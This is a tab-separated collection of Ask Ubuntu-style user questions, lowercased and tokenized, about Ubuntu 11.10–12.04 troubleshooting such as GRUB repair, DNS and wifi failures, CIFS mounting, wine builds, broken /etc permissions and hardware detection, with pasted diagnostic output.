123223	what is the keyboard shortcut to minimise a window to launcher in unity ?	in 10.10 that i was using before 12.04 you could use alt+f9 to minimise a window to the task bar . in 12.04 meta+ctrl+ cursor up down maximises and unmaximises a window . if you have a numeric keypad you can use ctrl+alt+0 to minimise to launcher . on my netbook i do n't have a numeric keypad and the normal numbers do not work with the above shortcut . how can i minimise windows with a keyboard shortcut ?
123227	how can i download application to add to several desktops so i wound n't download the apps on each computer from the internet ?	i am helping a non-profit put ubuntu on donated computers to give to children . we install ubuntu on a dozen computers a time . i was wondering if there is a method of choosing and downloading educational applications for ubuntu to put on a cd and use that or flash drive to install these applications on several computers simultaneously without using the internet .
123234	how to automount my windows partition at boot ?	i have a dual boot windows 7 , ubuntu 11.10 system . ubuntu was pretty much a vanilla installation and it was able to automount my two win partitions . i used to see them in nautilus . to recover this problem i manipulated the /etc/fstab which is operated under roots and that i am not able to unmount from nautilus as admin ( unless i sudo from terminal ) how can i restore the original behavior ( from my admin non-root account ) ? thank you
123239	how to enable services discovery api in googlecl ?	there are bits and pieces of information all over the place but i 'm trying to put it all together so that googlecl finally accesses more than the initial 7 services . does anyone know of a step-by-step ? right now any attempt outside these result in the error message : google tasks list did you specify the service correctly ? must be one of 'picasa ' , 'blogger ' , 'youtube ' , 'docs ' , 'contacts ' , 'calendar ' , 'finance' i installed googlecl from the ubuntu repos , authenticated a few bundled services like contacts , docs etc . and those work great , giving me access to do certain operations like upload from the command line . i would really like to get it going to support tasks and all the other elegible google services shown at https : //code.google.com/apis/explorer/ # _s=tasks here are some guides/partial steps i 've found : http : //code.google.com/p/googlecl/wiki/discoverymanual ( indicates needing to check it out updated googlecl from the subversion repository . ) http : //code.google.com/p/google-api-python-client/wiki/installation easy_install -- upgrade google-api-python-client http : //code.google.com/p/googlecl/wiki/install http : //code.google.com/p/googlecl/source/checkout sudo -i cd /usr/local/src/ svn checkout http : //googlecl.googlecode.com/svn/trunk/ googlecl-read-only cat googlecl-read-only/install.txt cd /usr/local/src/googlecl-read-only/ python setup.py install result : $ google > discovery list traceback ( most recent call last ) : file `` /usr/bin/google '' , line 488 , in run_interactive run_once ( options , args ) file `` /usr/bin/google '' , line 540 , in run_once options.config ) file `` /usr/bin/google '' , line 364 , in import_service force_gdata_v1 = config.lazy_get ( package.section_header , attributeerror : 'module ' object has no attribute 'section_header'
123255	how do you set up an ubuntu server that is `` encrypted at rest '' ?	we 're working on a project in which the customer needs the ubuntu server on which a web app and database are running to be `` encrypted at rest '' . what 's the best way to implement this ?
123267	dns stopped working on laptop	was working fine then stopped inexplicably . i can ping the gateway/dns router/firewall ( untangle ) using wifi and cable using wicd . network manager does not work on this computer firefox reports `` server not found '' & pinging google.com gives `` unknown host '' . wicd setting show proper dns ip , /etc/reslov.conf contains the correct ip ( it was missing but i replaced it ) . the dns server/gateway ( 192.168.0.1 ) works with other computers on the local network . from laptop ( 192.168.0.55 ) … user @ laptop : ~ $ cat /etc/resolv.conf # generated by networkmanager nameserver 192.168.0.1 user @ laptop : ~ $ ping 192.168.0.1 ping 192.168.0.1 ( 192.168.0.1 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.0.1 : icmp_req=1 ttl=64 time=0.854 ms 64 bytes from 192.168.0.1 : icmp_req=2 ttl=64 time=0.875 ms user @ laptop : ~ $ ping 192.168.0.5 ping 192.168.0.5 ( 192.168.0.5 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.0.5 : icmp_req=1 ttl=64 time=0.774 ms 64 bytes from 192.168.0.5 : icmp_req=2 ttl=64 time=0.747 ms from workstation ( 192.168.0.5 ) … user @ workstation : ~ $ ping 192.168.0.55 ping 192.168.0.55 ( 192.168.0.55 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.0.55 : icmp_req=1 ttl=64 time=0.754 ms 64 bytes from 192.168.0.55 : icmp_req=2 ttl=64 time=0.720 ms user @ workstation : ~ $ ping google.com ping google.com ( 74.125.224.110 ) 56 ( 84 ) bytes of data . 64 bytes from nuq04s08-in-f14.1e100.net ( 74.125.224.110 ) : icmp_req=1 ttl=46 time=90.6 ms 64 bytes from nuq04s08-in-f14.1e100.net ( 74.125.224.110 ) : icmp_req=2 ttl=46 time=92.2 ms from laptop… user @ laptop : ~ $ ping 74.125.224.110 ping 74.125.224.110 ( 74.125.224.110 ) 56 ( 84 ) bytes of data . 64 bytes from 74.125.224.110 : icmp_req=1 ttl=46 time=105 ms 64 bytes from 74.125.224.110 : icmp_req=2 ttl=46 time=91.5 ms 64 bytes from 74.125.224.110 : icmp_req=3 ttl=46 time=92.2 ms 64 bytes from 74.125.224.110 : icmp_req=4 ttl=46 time=89.3 ms and also from laptop ( using sudo ) … root @ laptop : ~ # ps -e | grep bind root @ laptop : ~ # ps -e | grep net 17 ? 00:00:00 netns root @ laptop : ~ # additional information… the laptop is dual boot , and with the same hardware windows has no dns problems . also , there are three connection methods to the internet , two wifi aps and a wired connection . this problem occurs on all three . skype seems to work , having no problems connecting to its network . this lenovo s12 ( intel atom ) laptop does not seem to play nice with linux/ubuntu as several custom work-arounds are required to get ubuntu working ⋯ e.g . needing wicd because network manager does not work . more here , here , here , and here .
123268	changing colors for user , host , directory information in terminal command prompt	is it possible to change the colors in the command prompt for the user @ computer , as well as the the current directory and command parts of the prompt display ? i 've already seen something like this done by osx users , but i do n't know how to do the same thing in gnome terminal ( i can only change foreground and background colors ) . it 'd be very useful when , for example , trying to compile programs that have errors , since long , unformatted messages make it hard to distinguish which lines are commands and which are output .
123273	installing wine 1.5 : configure : error : can not build a 32-bit program , you need to install 32-bit development libraries	wine installer v1.0 warning ! ! wine binary ( still ) found , which may indicate a ( conflicting ) previous installation . you might want to abort and uninstall wine first . ( if you previously tried to install from source manually , run 'make uninstall ' from the wine root directory ) we need to install wine as the root user . do you want us to build wine , 'su root ' and install wine ? enter 'no ' to build wine without installing : ( yes/no ) yes running configure ... checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking whether make sets $ ( make ) ... yes checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking for g++ ... g++ checking whether we are using the gnu c++ compiler ... yes checking whether g++ accepts -g ... yes checking for cpp ... cpp checking whether gcc -m32 works ... no configure : error : can not build a 32-bit program , you need to install 32-bit development libraries . configure failed , aborting install . how do i fix this problem ?
123275	ca n't repair grub	i 'm trying to repair my grub after windows 7 installation . i have 64bit and 32bit live ubuntu cds + super grub disk ( rescatux ) + boot-repair-disk . i 'm following this answer 's steps . but in 6th step i 'm getting /usr/sbin/grub-probe : error while loading shared libraries : libdevmapper.so.1.02.1 : wrong elf class : elfclass32 after executing update-grubcommand . and then i tried to use boot-repair . firstly tried recommended repair and it 's finished successfully but when i restart there is n't boot menu . and then next time i hold left shift while booting . still it 's booting windows automatically . and then i tried to use advanced repair . same results . this is my boot-repair logs : http : //paste.ubuntu.com/936178/ i need specific answers for my system . thank you . note : my installed ubuntu system is 64 bit and i have 64bit and 32 bit live cds note 2 ( after booting with a 32bit live cd ) ( look at note 3 for 64bit live cd results ) file /lib/libdevmapper.so.1.02.1 - > /lib/libdevmapper.so.1.02.1 : elf 32-bit lsb shared object , intel 80386 , version 1 ( sysv ) , dynamically linked , stripped file /usr/sbin/grub-probe - > /usr/sbin/grub-probe : elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.15 , stripped ubuntu @ ubuntu : ~ $ sudo mkdir /mnt/ubusda3 ubuntu @ ubuntu : ~ $ sudo mount -t ext4 /dev/sda3 /mnt/ubusda3 ubuntu @ ubuntu : ~ $ file /mnt/ubusda3/sbin/init /mnt/ubusda3/sbin/init : elf 64-bit lsb shared object , x86-64 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.15 , stripped note 3 ( after booting with a 64bit live cd ) file /lib/libdevmapper.so.1.02.1 - > /lib/libdevmapper.so.1.02.1 : elf 64-bit lsb shared object , x86-64 , version 1 ( sysv ) , dynamically linked , stripped file /usr/sbin/grub-probe - > /usr/sbin/grub-probe : elf 64-bit lsb executable , x86-64 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.15 , stripped ubuntu @ ubuntu : ~ $ sudo su root @ ubuntu : /home/ubuntu # mkdir /mnt/ubusda3 root @ ubuntu : /home/ubuntu # mount -t ext4 /dev/sda3 /mnt/ubusda3 root @ ubuntu : /home/ubuntu # file /mnt/ubusda3/sbin/init /mnt/ubusda3/sbin/init : elf 64-bit lsb shared object , x86-64 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.15 , stripped root @ ubuntu : /home/ubuntu # file /mnt/ubusda3/lib/libdevmapper.so.1.02.1 /mnt/ubusda3/lib/libdevmapper.so.1.02.1 : elf 32-bit lsb shared object , intel 80386 , version 1 ( sysv ) , dynamically linked , stripped
123282	how do i install photoshop cs5 extended from the cd ?	i 'm quite new ( or brand new ) to ubuntu . i want to install my adobe photoshop cs5 extended . i have purchased a licensed copy . i downloaded wine and ran the start up through that . everything ran smoothly until it actually started installing . it barely starts and i get an error message from the installation screen from adobe photoshop . can anyone help ?
123283	temporary admin status for system maintenance on user account	i have a user account that i have given sudo privileges on my computer . i use this account for everyday use and system maintenance . i know it is n't a good idea to give sudo permissions to an everyday account . is there some way to get admin privileges temporarily when i want to do system maintenance , or should i really be using two user accounts ?
123295	wireless is disabled by hardware switch on a dell latitude	i have the same problem in 11.10 , and it occured just before i installed 12.04 , thought by remove and complete install 12.04 the problem wolud be gone , but no still there also in 12.04 i have a dell latitude with a intel 5100 wireless it was working perfect before , dont know what happend or what i did ... ... ... . also the sudo commands where do you enter those , by alt f2 ? ? or in the bios ? ?
123299	ubuntu 12.04 starts up in 40 seconds , 11.10 it was 16 seconds	both on the same laptop ; any tips ? ? did n't i install it right or is it because i have n't been connected to the internet and so do n't have the update packages ? wireless is disabled by a hardware problem .
123305	how to find a folder on my server with a certain name ?	i have a directory somewhere on my server wth the name `` exampledocs '' . i tried to find it 's location using : ls -d */ | grep -e 'exampledocs' and find * -regextype posix-extended \-regex 'exampledocs ' \-type d and grep `` exampledocs '' * -- recursive nothing worked . how can i do this from the command line ? i 'm using ubuntu server 11.0 .
123308	minecraft : modloader and mods	i was able to install the executable version of minecraft.jar for linux , but i can not seem to be able to install modloader or any mods . i install the mod like i would on a pc- delete meta-inf and then move the class files to minecraft.jar . once i install modloader and the mod which i was trying to install , which was the timber mod , i try to execute the file and it does n't load .
123313	usb mouse on laptop wo n't change window focus	i have an asus g74sx dual-booting ubuntu and win7 via wubi . my touchpad and usb mouse work perfectly in windows , but behave abnormally in ubuntu ; if i just use the touchpad , everything works fine , but if i try to use a usb mouse , the mouse will function on the window that has focus , or on the desktop , but refuses to change focus unless i right click on the window 's titlebar repeatedly until it snaps to . the odd thing is that this behavior also affects the touchpad ; it has the exact same issue while the usb mouse is plugged in . removing the usb mouse will return the touchpad to normal . i have tested this on unity , gnome-shell , gnome classic , and enlightenment . i 'm a linux newbie , so this may be quite a ways off , but its almost as if ubuntu is not interpreting my touchpad as a touchpad ; rather , it thinks its a proper standard mouse . this is also confirmed by trying to install synaptiks for multitouch support ; the touchpad is indeed synaptics powered but ubuntu does n't recognize it when trying to install that app from the software center . if it matters , the usb mouse is a cyborg r.a.t . 7 wired mouse , and performs flawlessly in windows . i can also confirm this issue occurs when using a logitech mx revolution wireless mouse .
123315	recommendation for socket software	i 'm learning how to deal with socket programming with socket ( ) , bind ( ) , connect ( ) , listen ( ) , etc . so i 'm looking for a socket software that is similar like this , that works in ubuntu . the software in the link only works in windows . any recommendations ?
123318	migrating fonts from old to new server	i have an `` old '' ubuntu 11.10 server . i have a new ( amazon ec2 ) ubuntu 11.10 server . i can only access them through the command line . how can i migrate all the installed fonts from the old machine to the new machine ? i assume it is just copying some subdirectories . is it that easy ? background : i am running tests on my software , on both machines and it is giving different results , because the available fonts are different . ( and the tests are sensitive to changes in pixels . )
123324	how to get the eglibc source code used by ubuntu ?	how do i get the source code for eglibc in a format that will allow stepping through the source with gdb ? i have tried using apt-get source libc6-dev and that works for getting the source code , but i think that since the pre-processor directives were not applied that the line numbers that gdb has does not match with the source i downloaded . this makes it less useful when trying to step through the source and look at how functions in libc are working .
123326	supported hardware list	to start i should admit that i have n't done much work in ubuntu in a few years . i am wondering is if there is still a single , canonical source of the hardware supported by the newest distribution of ubuntu . in specific , i want to get a 17-inch hp dv7t quad edition laptop . but more generally , it is just bothering me how little luck i 'm having finding an up-to-date support listing .
123328	is it safe to remove files in .sent/cur directory of dovecot ?	for unknown reasons the .sent/cur folder of one of the users had grown up to 500 mb . is it safe if i remove all the files of this directory ? and why it had grown up so dramatically ? note , that this situation is happened just for one specific user , other users has in their .sent/cur folder just some kilobytes of files . thank you !
123332	where can i download a live cd ?	the whole `` livecd '' concept is mentioned all over the place , and i 've used live usb sticks before , but there appears to be nowhere to download this version . i thought that maybe this is wrapped into the standard version of ubuntu , but when i create a usb stick from the latest version ( 11.10 ) and try to boot from it , it loads up a text-based menu instead of the live cd that i 've seen before . the menu gives an option to boot from the disk , but the boot freezes before ever making it to the gui . is there something i 'm missing ? is there a livecd iso hidden somewhere that i can download ?
123335	using /var/log to backup some folders / database contents	i need to backup regularly ( daily , using cron ) some folders along with mysql database contents ( in sql format ) . is it okay to use /var/log ( by creating a new folder to be used in it ) for storing these backup files ? in longer interval the contents of that folder will be backed up in external media . thanks in advance .
123336	how to do grub editing ?	how to do grub editing in ubuntu version 11.04 and 11.10 ? what is the purpose of grub editing ? if anyone knows the solution please answer it..
123337	error when mounting a nas drive on ubuntu server 11.10	i 've got a problem that i just ca n't figure out . tried looking at other answers and working through the suggestions , but i still get the same error . i have a readynas drive with cifs enabled and shares set up . i can access the shares from windows and from ubuntu desktop 8 . there are no username/passwords needed to access the shares . however , i am now setting up an ubuntu server using 11.10 and when i try to mount the share using the following : $ sudo mount -t cifs //nasdrive/media /mnt/readynas/media i get the following error : cifs vfs : send error in sesssetup = -13 cifs vfs : cifs_mount failed w/return code = -13 mount error ( 13 ) : permission denied i 've tried adding `` -o uid=1000 , gid=1000 , username=guest , password= '' as well , with the same results . i am a bit of a newbie with command line linux , so please be gentle with the jargon . thanks in advance for any help you can give !
123338	black screen after the grub screen	sometimes ( most of them ) , i get a black screen after selecting ubuntu on the grub.the screen becomes a pretty dark purple ( like the one of the grub screen ) , and then it becomes black.nothing after that ... i use a xps 15 with ubuntu 11.10 dual boot with windows 7 .
123340	how can i assign hotkey for a keyboard layout ?	how can i assign hotkey for a keyboard layout , as showed on screenshot from windows ? i want to turn on turkish on ctrl + 1 and tatar on ctrl + 2
123341	what are the standard file permissions for the /etc directory ( file )	i kinda screwed up the /etc directory by running : sudo chmod 417 /etc leaving me unable to use sudo : sudo : ca n't open /etc/sudoers : permission denied . sudo : no valid sudoers sources foundm quitting ive been trying to fix it via recovery mode but i 'm not sure to what mode i should set it . ( i know sudoers is 0440 , but this doesnt fix it because /etc is still messed up . ) oh and for the future , how do i add lines to files in etc without screwing up the permissions of etc ? thanks in advance , joeri . p.s . im running in virtual box if that makes a difference . edit : booting in recovery and running : root @ joeri-virtualbox : / # chmod 755 etc chmod : changing permissions of 'etc ' : read-only file system root @ joeri-virtualbox : / # cd etc root @ joeri-virtualbox : /etc # ls -ld drw-rw-rwx 139 root root 12288 2012-04-19 16:29 doesnt change the permissions of etc . doing the same on a self created folder on the desktop does , so chmod is working , just not on etc .
123350	graphics not working properly with ubuntu 11.04 and later	my machine is intel integrated graphics g31/33 , core2duo , 3gb ram . i am currently using ubuntu 10.10 maverick . i have tried installing latest versions of ubuntu but none of them work properly . all of them have problem with my graphics . now , ubuntu 10.10 maverick is no longer supported . is there a way it can be used safely for longer ?
123353	enlarging the right half of gnome-shell panel ?	i have gnome-panel with various extensions installed . the right half is crammed so that many items are not displayed ( i already removed volume , username , a11y , ... ) . is there a way to make the items stretch to the left , to the unused space ? edit : i am using gnome-shell 3.4 from precise repos .
123359	how to enable multi-touch gestures on lenovo thinkpad w510 w/touchscreen - 12.04 w/unity	i am wondering how the user in this video got his w510 configured to use multi-touch with his touchscreen . i did a sudo apt-get install utouch but i need some handholding in where to go next . http : //youtu.be/8vwt11gmc3g much appreciated !
123363	toshiba netbook works on liveusb , but not when installed	when running ubuntu 11.10 live on my usb , everything works perfectly . once i install the os , however , most of the hardware is no longer recognized . once i booted into ubuntu , i had a number of problems : the touchpad does n't work . the usb mouse is detected only after unplugging it and plugging it back in . wireless network not detected ; network manager does n't provide the option to `` connect to wireless network '' when an ethernet cable is plugged in , the connection is detected , but automatic connection fails . no sound output . my toshiba netbook has a 120gb hdd , 1gb ram , and windows xp installed . after installing ubuntu , some partitions were created : sda1 : 100gb : working xp sda2 : ~18gb : / sda3 : ~500mb /boot sda4 : ~2gb swap all my hardware information from lshw : desuna-toshiba-nb100 description : notebook version : pll10e-00k01yg3 width : 32 bits capabilities : smbios-2.4 dmi-2.4 configuration : boot=normal chassis=notebook family=intel_mobile sku=basicnb_qs uuid=ed62ddb0-a1cd-11dd-a70e-001e337691eb *-core description : motherboard product : portable pc vendor : toshiba physical id : 0 version : base board version serial : base board serial number slot : base board chassis location *-firmware description : bios vendor : insyde physical id : 0 version : 1.10 date : 09/15/2008 size : 1mib capabilities : pci upgrade shadowing cdboot bootselect socketedrom edd int13floppynec int13floppytoshiba int13floppy360 int13floppy1200 int13floppy720 int13floppy2880 int9keyboard int10video acpi usb *-memory description : system memory physical id : 15 slot : system board or motherboard size : 1gib capacity : 1gib *-bank description : dimm ddr2 synchronous 533 mhz ( 1.9 ns ) product : hymp112s64cp6-s6 vendor : hynix semiconductor ( hyundai electronics ) physical id : 0 serial : 0x00002123 slot : j2 size : 1gib width : 64 bits clock : 533mhz ( 1.9ns ) *-cpu description : cpu product : intel ( r ) atom ( tm ) cpu n270 @ 1.60ghz vendor : intel corp. physical id : 1a bus info : cpu @ 0 version : 6.12.2 serial : 0001-06c2-0000-0000-0000-0000 slot : cpu size : 800mhz capacity : 1600mhz width : 32 bits clock : 533mhz capabilities : fpu fpu_exception wp vme de tsc msr pae mce cx8 apic mtrr pge mca cmov pat clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe constant_tsc arch_perfmon pebs bts aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 xtpr pdcm movbe lahf_lm cpufreq configuration : id=0 *-cache:0 description : l2 cache physical id : 1b slot : unknown size : 512kib capacity : 512kib capabilities : synchronous internal write-back unified *-cache:1 description : l1 cache physical id : 1c slot : unknown size : 32kib capacity : 32kib capabilities : synchronous internal write-back instruction *-logicalcpu:0 description : logical cpu physical id : 0.1 width : 32 bits capabilities : logical *-logicalcpu:1 description : logical cpu physical id : 0.2 width : 32 bits capabilities : logical *-pci description : host bridge product : mobile 945gme express memory controller hub vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 03 width : 32 bits clock : 33mhz configuration : driver=agpgart-intel resources : irq:0 *-display:0 description : vga compatible controller product : mobile 945gme express integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 03 width : 32 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:17 memory:54280000-542fffff ioport:40f0 ( size=8 ) memory:40000000-4fffffff memory:54300000-5433ffff *-display:1 unclaimed description : display controller product : mobile 945gm/gms/gme , 943/940gml express integrated graphics controller vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 03 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory:54200000-5427ffff *-multimedia unclaimed description : audio device product : n10/ich 7 family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 02 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : d0000000-d0003fff *-pci:0 description : pci bridge product : n10/ich 7 family pci express port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : 02 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport:2000 ( size=8192 ) memory:53200000-541fffff ioport:50000000 ( size=17825792 ) *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 02 serial : 00:1e:33:76:91 : eb size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=n/a latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:42 ioport:2000 ( size=256 ) memory:50010000-50010fff memory:50000000-5000ffff memory:50020000-5003ffff *-pci:1 description : pci bridge product : n10/ich 7 family pci express port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : 02 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:41 ioport:1000 ( size=4096 ) memory:52100000-531fffff ioport:51100000 ( size=16777216 ) *-network unclaimed description : ethernet controller product : ar242x / ar542x wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix bus_master cap_list configuration : latency=0 resources : memory:52100000-5210ffff *-usb:0 description : usb controller product : n10/ich 7 family usb uhci controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:21 ioport:40a0 ( size=32 ) *-usb:1 description : usb controller product : n10/ich 7 family usb uhci controller # 2 vendor : intel corporation physical id : 1d.1 bus info : pci @ 0000:00:1d.1 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:22 ioport:4080 ( size=32 ) *-usb:2 description : usb controller product : n10/ich 7 family usb uhci controller # 3 vendor : intel corporation physical id : 1d.2 bus info : pci @ 0000:00:1d.2 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:20 ioport:4060 ( size=32 ) *-usb:3 description : usb controller product : n10/ich 7 family usb uhci controller # 4 vendor : intel corporation physical id : 1d.3 bus info : pci @ 0000:00:1d.3 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:23 ioport:4040 ( size=32 ) *-usb:4 description : usb controller product : n10/ich 7 family usb2 ehci controller vendor : intel corporation physical id : 1d.7 bus info : pci @ 0000:00:1d.7 version : 02 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:21 memory:54344400-543447ff *-pci:2 description : pci bridge product : 82801 mobile pci bridge vendor : intel corporation physical id : 1e bus info : pci @ 0000:00:1e.0 version : e2 width : 32 bits clock : 33mhz capabilities : pci subtractive_decode bus_master cap_list *-isa description : isa bridge product : 82801gbm ( ich7-m ) lpc interface bridge vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 02 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : latency=0 *-ide description : ide interface product : 82801g ( ich7 family ) ide controller vendor : intel corporation physical id : 1f.1 bus info : pci @ 0000:00:1f.1 version : 02 width : 32 bits clock : 33mhz capabilities : ide bus_master configuration : driver=ata_piix latency=0 resources : irq:11 ioport:1f0 ( size=8 ) ioport:3f6 ioport:170 ( size=8 ) ioport:376 ioport:40c0 ( size=16 ) *-storage description : sata controller product : 82801gbm/ghm ( ich7 family ) sata ahci controller vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 logical name : scsi2 version : 02 width : 32 bits clock : 66mhz capabilities : storage msi pm ahci_1.0 bus_master cap_list emulated configuration : driver=ahci latency=0 resources : irq:43 ioport:40d8 ( size=8 ) ioport:40fc ( size=4 ) ioport:40d0 ( size=8 ) ioport:40f8 ( size=4 ) ioport:4020 ( size=16 ) memory:54344000-543443ff *-disk description : ata disk product : toshiba mk1252gs vendor : toshiba physical id : 0.0.0 bus info : scsi @ 2:0.0.0 logical name : /dev/sda version : lv01 serial : 88n1c3bit size : 111gib ( 120gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=442774ea *-volume:0 description : windows ntfs volume physical id : 1 bus info : scsi @ 2:0.0.0,1 logical name : /dev/sda1 logical name : /media/2c5476055475d1d6 version : 3.1 serial : a67d70c4-3fa9-2e41-9d54-9f36cf5d38b5 size : 93gib capacity : 93gib capabilities : primary bootable ntfs initialized configuration : clustersize=4096 created=2008-09-25 01:47:00 filesystem=ntfs modified_by_chkdsk=true mount.fstype=fuseblk mount.options=rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , default_permissions , allow_other , blksize=4096 mounted_on_nt4=true resize_log_file=true state=mounted upgrade_on_mount=true *-volume:1 description : extended partition physical id : 2 bus info : scsi @ 2:0.0.0,2 logical name : /dev/sda2 size : 1907mib capacity : 1907mib capabilities : primary extended partitioned partitioned : extended *-logicalvolume description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 1907mib capabilities : nofs *-volume:2 description : ext4 volume vendor : linux physical id : 3 bus info : scsi @ 2:0.0.0,3 logical name : /dev/sda3 logical name : /boot version : 1.0 serial : b7d7bfa6-ef74-4dd4-b451-cd4322ce0f8a size : 477mib capacity : 477mib capabilities : primary journaled extended_attributes huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2012-04-15 21:56:27 filesystem=ext4 lastmountpoint=/boot modified=2012-04-16 07:11:26 mount.fstype=ext4 mount.options=rw , relatime , user_xattr , acl , barrier=1 , data=ordered mounted=2012-04-16 07:11:26 state=mounted *-volume:3 description : ext4 volume vendor : linux physical id : 4 bus info : scsi @ 2:0.0.0,4 logical name : /dev/sda4 logical name : / version : 1.0 serial : 8651c2cb-2331-4e4b-a149-933f101169ac size : 16gib capacity : 16gib capabilities : primary journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2012-04-15 21:56:55 filesystem=ext4 lastmountpoint=/ modified=2012-04-15 22:23:54 mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , user_xattr , acl , barrier=1 , data=ordered mounted=2012-04-16 07:11:26 state=mounted *-serial unclaimed description : smbus product : n10/ich 7 family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 02 width : 32 bits clock : 33mhz configuration : latency=0 resources : ioport:4000 ( size=32 ) *-scsi:0 physical id : 1 bus info : usb @ 1:8 logical name : scsi6 capabilities : emulated scsi-host configuration : driver=usb-storage *-disk description : scsi disk physical id : 0.0.0 bus info : scsi @ 6:0.0.0 logical name : /dev/sdb *-scsi:1 physical id : 2 bus info : usb @ 1:3 logical name : scsi7 capabilities : emulated scsi-host configuration : driver=usb-storage *-disk description : scsi disk physical id : 0.0.0 bus info : scsi @ 7:0.0.0 logical name : /dev/sdc size : 7509mib ( 7873mb ) capabilities : partitioned partitioned : dos configuration : signature=0005d459 *-volume description : windows fat volume vendor : mkdosfs physical id : 1 bus info : scsi @ 7:0.0.0,1 logical name : /dev/sdc1 logical name : /media/963b-da32 version : fat32 serial : 963b-da32 size : 7503mib capacity : 7503mib capabilities : primary bootable fat initialized configuration : fats=2 filesystem=fat mount.fstype=vfat mount.options=rw , nosuid , nodev , relatime , uid=1000 , gid=1000 , fmask=0022 , dmask=0077 , codepage=cp437 , iocharset=iso8859-1 , shortname=mixed , showexec , utf8 , flush , errors=remount-ro state=mounted in short , everything works fine with a liveusb , but after installation , none of the hardware works . how do i fix this ?
123364	i can not try live cd	i inserted boot cd into drive and choose `` try '' , but monitor appears many horizontal lines passing through . my laptop is wolfnfox , win xp sp1 . can you help me ?
123365	image info ( resolution , etc ) inside of nautilus	i use ubuntu 11.10 with gnome 3 ( gnome shell ) ui . is it possible to get a quick image info by clicking or hovering the image , without having to right click - > properties - > image ? i often have to know image resolution and repeating these steps for 100 images is so frustrating .
123369	no wifi networks show up in list	i 've recently had some issues with my wireless . ubuntu is detecting the wifi card and the kernel module is loaded and i can even turn the wifi on and off from the menu up in the top right ( this is in gnome shell , but the behavior is the same in unity ) . however , i ca n't get a single wifi network to show up and i ca n't connect to any wifi network by manually entering the ssid . if i boot into os x , the wifi works fine . here 's what i have from iwconfig : wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off here 's lspci : 03:00.0 network controller : broadcom corporation bcm4331 802.11a/b/g/n ( rev 02 ) i 'm not sure what other info might be needed . i have n't tried a whole lot since i have n't seen these particular symptoms anywhere else . i have restarted the laptop numerous times , logged out and in , reloaded the kernel module ( b43 ) all to no avail .
